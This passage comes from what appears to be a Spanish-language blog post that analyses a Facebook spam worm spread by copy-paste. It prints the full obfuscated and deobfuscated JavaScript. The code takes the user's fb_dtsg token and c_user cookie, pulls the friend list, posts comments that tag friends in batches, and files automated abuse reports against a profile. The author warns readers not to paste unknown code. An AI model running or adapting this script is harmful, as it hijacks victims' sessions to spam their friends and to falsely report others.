user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

En el anterior segmento de código se aprecia un arreglo que contiene el parametro 1382559332008832, el cual hacia referencia al posts donde se encontraba el script https://www.facebook.com/permalink.php?story_fbid=1382559332008832&id=100007643351586&ref=notif&notif_t=comment_mention (El posts y la cuenta ya ha sido eliminadas). La verdad no me explico como funciona esta parte, estoy abierto a sugerencias.

La sección de código que más me llamo la atención fue le código ofuscado.

Código original

var _0xb161 = ["\x76\x61\x6C\x75\x65", "\x66\x62\x5F\x64\x74\x73\x67", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65", "\x6D\x61\x74\x63\x68", "\x63\x6F\x6F\x6B\x69\x65", "\x67\x65\x74\x54\x69\x6D\x65", "\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70", "\x66\x62\x5F\x64\x74\x73\x67\x3D", "\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41", "\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D", "\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30", "\x50\x4F\x53\x54", "\x6F\x70\x65\x6E", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x73\x74\x61\x74\x75\x73", "\x63\x6C\x6F\x73\x65", "\x73\x65\x6E\x64", "\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];

Código desofuscado

var _0xb161 = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "getTime", "//www.facebook.com/ajax/report/social.php", "fb_dtsg=", "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A", "%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2FNan.ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A", "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A", "%2C%22user%22%3A", "%7D&file_report=1&__user=", "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880", "POST", "open", "onreadystatechange", "readyState", "status", "close", "send", "100006952119048"];var fb_dtsg = document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];var user_id = document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);var now = (new Date)[_0xb161[5]]();function Report(_0x45e7x5) { var _0x45e7x6 = new XMLHttpRequest(); var _0x45e7x7 = _0xb161[6]; var _0x45e7x8 = _0xb161[7] + fb_dtsg + _0xb161[8] + _0x45e7x5 + _0xb161[9] + _0x45e7x5 + _0xb161[10] + now + _0xb161[11] + user_id + _0xb161[12] + user_id + _0xb161[13]; _0x45e7x6[_0xb161[15]](_0xb161[14], _0x45e7x7, true); _0x45e7x6[_0xb161[16]] = function() { if (_0x45e7x6[_0xb161[17]] == 4 && _0x45e7x6[_0xb161[18]] == 200) { _0x45e7x6[_0xb161[19]]; }; }; _0x45e7x6[_0xb161[20]](_0x45e7x8);};var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "1435336293368456", "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText", ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ", "&filter[0]=user", "&options[0]=friends_only", "&options[1]=nm", "&token=v7", "&viewer=", "&__user=", "https://", "indexOf", "URL", "GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor", "&ft_ent_identifier=", "&comment_text=", "&source=2", "&client_id=1377871797138:1707018092", "&reply_fbid", "&parent_comment_id", "&rootid=u_jsonp_2_3", "&clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid":", "}", "&attached_sticker_fbid=0", "&attached_photo_fbid=0", "&giftoccasion", "&ft[tn]=[]", "&__a=1", "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "&__req=q", "&fb_dtsg=", "&ttstamp=", "POST", "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader", "status", "close"];var fb_dtsg = document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id = document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id = _0xa22c[5];var arkadaslar = [];var svn_rev;function arkadaslari_al(id) { var _0x7892x7 = new XMLHttpRequest(); _0x7892x7[_0xa22c[6]] = function() { if (_0x7892x7[_0xa22c[7]] == 4) { eval(_0xa22c[8] + _0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9], _0xa22c[10]) + _0xa22c[13]); for (f = 0; f < Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]] / 27); f++) { mesaj = _0xa22c[10]; mesaj_text = _0xa22c[10]; for (i = f * 27; i < (f + 1) * 27; i++) { if (arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) { mesaj += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]] + _0xa22c[22]; mesaj_text += _0xa22c[23] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]; }; }; yorum_yap(id, mesaj); }; }; }; var _0x7892x8 = _0xa22c[24]; _0x7892x8 += _0xa22c[25]; _0x7892x8 += _0xa22c[26]; _0x7892x8 += _0xa22c[27]; _0x7892x8 += _0xa22c[28] + user_id; _0x7892x8 += _0xa22c[29] + user_id; if (document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30]) >= 0) { _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[34] + _0x7892x8, true); } else { _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[36] + _0x7892x8, true); }; _0x7892x7[_0xa22c[37]]();};function RandomArkadas() { var _0x7892xa = _0xa22c[10]; for (i = 0; i < 9; i++) { _0x7892xa += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]] + _0xa22c[22]; }; return _0x7892xa;};function yorum_yap(id, _0x7892xc) { var _0x7892xd = new XMLHttpRequest(); var _0x7892x8 = _0xa22c[10]; _0x7892x8 += _0xa22c[40] + id; _0x7892x8 += _0xa22c[41] + encodeURIComponent(_0x7892xc); _0x7892x8 += _0xa22c[42]; _0x7892x8 += _0xa22c[43]; _0x7892x8 += _0xa22c[44]; _0x7892x8 += _0xa22c[45]; _0x7892x8 += _0xa22c[46]; _0x7892x8 += _0xa22c[47] + id + _0xa22c[48]; _0x7892x8 += _0xa22c[49]; _0x7892x8 += _0xa22c[50]; _0x7892x8 += _0xa22c[51]; _0x7892x8 += _0xa22c[52]; _0x7892x8 += _0xa22c[29] + user_id; _0x7892x8 += _0xa22c[53]; _0x7892x8 += _0xa22c[54]; _0x7892x8 += _0xa22c[55]; _0x7892x8 += _0xa22c[56] + fb_dtsg; _0x7892x8 += _0xa22c[57]; _0x7892xd[_0xa22c[35]](_0xa22c[58], _0xa22c[59], true); _0x7892xd[_0xa22c[62]](_0xa22c[60], _0xa22c[61]); _0x7892xd[_0xa22c[6]] = function() { if (_0x7892xd[_0xa22c[7]] == 4 && _0x7892xd[_0xa22c[63]] == 200) { _0x7892xd[_0xa22c[64]]; }; }; _0x7892xd[_0xa22c[37]](_0x7892x8);};arkadaslari_al(id);

Para desofucarlo use http://ddecode.com/hexdecoder/?results=9285c305b1edeb3fd3065cc304313a32.

Es obvio que es trabajo de alguien que conoce el API de facebook. Por el momento es lo que he podido ver en este script, me pareció muy interesante. Estoy abierto a sugerencias y observaciones. Raza no den click en cualquier parte y no copien y peguen cualquier cosa. No se dejen engañar, Saludos.

Actualización: 04/02/2014

Platicando un profesor de mi universidad, encontramos que existen más versiones de este mismo Script y que básicamente hacen lo mismo. Llegando a casa escribiré más acerca de esto.